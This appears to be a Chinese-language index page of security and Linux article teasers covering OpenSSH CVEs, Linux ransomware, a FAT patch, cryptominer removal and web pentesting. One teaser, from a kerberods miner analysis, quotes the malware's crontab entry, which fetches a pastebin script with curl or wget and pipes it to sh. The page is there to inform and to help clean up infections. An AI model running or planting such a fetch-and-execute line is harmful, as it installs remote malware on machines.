• Redis Centos镜像漏洞修复

    日期:

    Redis Centos镜像漏洞修复以及升级内核版本 linux内核介绍:https://www.cnblogs.com/still-smile/p/11597620.html redis当前所有的Centos镜像默认自带的ssh 版本过低,所以会出现以下漏洞。 1 OpenSSH 命令注入漏洞(CVE-2020-15778) 2 OpenSSH 安全漏洞(CVE-...

  • Linux 更安全?大规模 Windows 勒索软件移植至 Linux

    日期:

    安全公司 Kaspersky 日前 发现 了一个新的文件加密木马,它是 ELF 可执行文件,旨在对基于 Linux 的操作系统计算机上的数据进行加密。 Kaspersky 经过初步分析,发现遇到的实际是已知勒索软件 RansomEXX 的 Linux 构建版本。 RansomEXX 是年初开始活跃的一种...

  • Linux FAT 文件系统预读缺陷,补丁提升 7 倍性能

    日期:

    Linux 内核现在已经增加了对 exFAT 的支持,同时它也没有放弃维护原有 FAT 文件系统驱动,甚至现在从邮件列表上看,FAT 性能方面可能会有大幅提升。 开发 Tux3 文件系统而闻名的 OGAWA Hirofumi 在邮件列表中提到了目前 Linux FAT 文件系统的预读取处理有瑕疵...

  • 勒索软件利用 Windows 驱动程序漏洞关闭防病毒软件

    日期:

    安全公司 Sophos 警告说,新的勒索软件攻击使用了易受攻击的技嘉驱动程序,试图闯入 Windows 系统,然后禁用正在运行的安全软件。该攻击基于 2018 年在技嘉驱动程序中发现的安全漏洞,该安全漏洞在 CVE-2018-19320 中有详细说明。 该驱动程序在技嘉确认该错误...

  • 2020 年勒索软件将继续流行

    日期:

    勒索软件将在 2020 年继续困扰组织,因为网络加密恶意软件攻击背后的网络罪犯几乎没有被抓住的风险。因此,对攻击者而言,风险很小,但潜在的回报却很大。 在过去的一年中,有许多勒索软件攻击的例子,已经有受害者屈服于攻击者的勒索要求,他们通常支付数十...

  • kerberods挖矿病毒查杀及分析(crontab 挖矿 curl -fsSL https://pastebin.com/raw)

    日期:

    一. 症状及表现 CPU使用率异常高,外出流量异常 crontab异常,存在如下定时任务(基本上就可以确定了) [root@it.net.cn ~]# crontab -l */15 * * * * (curl -fsSL https://pastebin.com/raw/xmxHzu5P||wget -q -O- https://pastebin.com/raw/xmxHzu5P)|sh 在...

  • 记录一次清除Linux挖矿病毒的经历(sysupdate, networkservice进程)

    日期:

    起因 闲来无事准备用服务器搭建个环境玩玩,连上服务器之后发现命令行卡的飞起,使用top看看cpu占用率,这里上前三截图。 sysupdate 系统更新?? networkservice 网络服务??? 上阿里云管理控制台看看CPU占用率,占用率直接100%,再看看CPU以及内存的记录...

  • 挖矿病毒清除记录

    日期:

    挖矿病毒清除记录 出现现象 查看定时任务 开始解决 目前还存在三个问题: 出现现象 cpu是4核的但使用htop无法查看到,之前跑的服务进程都被kill掉了,重新启动服务依然被kill掉。 查看定时任务 crontab -l 会出现如下这些curl请求一个域名里面的数据并且下载...

  • 【安全】Web应用常见业务逻辑漏洞

    日期:

    1短信炸弹 漏洞描述 短信轰炸攻击是常见的一种攻击,攻击者通过网站页面中所提供的发送短信验证码的功能处,通过对其发送数据包的获取后,进行重放,如果服务器短信平台未做校验的情况时,系统会一直去发送短信,这样就造成了短信轰炸的漏洞。 渗透测试 手工...

  • 【安全】Web渗透测试(全流程)

    日期:

    1 信息收集 1.1 域名、IP、端口 域名信息查询:信息可用于后续渗透 IP信息查询:确认域名对应IP,确认IP是否真实,确认通信是否正常 端口信息查询:NMap扫描,确认开放端口 如果不会用Nmap,看这里:NMAP 基础教程(功能介绍,安装,使用) 发现:一共开放两...